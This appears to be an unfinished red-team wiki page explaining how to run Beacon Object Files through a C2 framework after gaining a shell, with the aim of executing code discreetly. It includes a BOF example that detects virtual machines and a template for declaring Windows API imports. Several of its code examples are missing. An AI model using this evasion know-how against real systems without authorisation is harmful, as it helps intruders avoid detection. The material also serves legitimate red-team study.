🛠️ Stealth with C2
This technique can be used only after having obtained an initial access on the target
This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs
once you have a shell on the victim, one of the most discreet ways to execute code is through object file because the idea is to avoid creating a sub-process but rather to allocate memory to run code and then resume its initial size.
Here is an example of how to launch the BoF (Beacon Object File) once compiled. The source code is available here and the goal is to verify if we are dealing with a virtual machine or not.
For example, if you need the
Look at the Windows documentation (in our example https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regclosekey) to get the list of the arguments.
In our case :
[in] HKEY hKey
Then, get the name of the library used (at the bottom of the page) in our case it is :
We have to structure it like this :
DECLSPEC_IMPORT LSTATUS WINAPI <lib>$<Function>(<Args List>);
Still in our case, we will get this:
DECLSPEC_IMPORT LSTATUS WINAPI ADVAPI32$RegCloseKey(HKEY);
Simply use the function like this in our code:
It is also possible to load a library and then call the method using methods like
Below is an example of how to use this approach:
More information at this URL: https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm.
Last modified 16d ago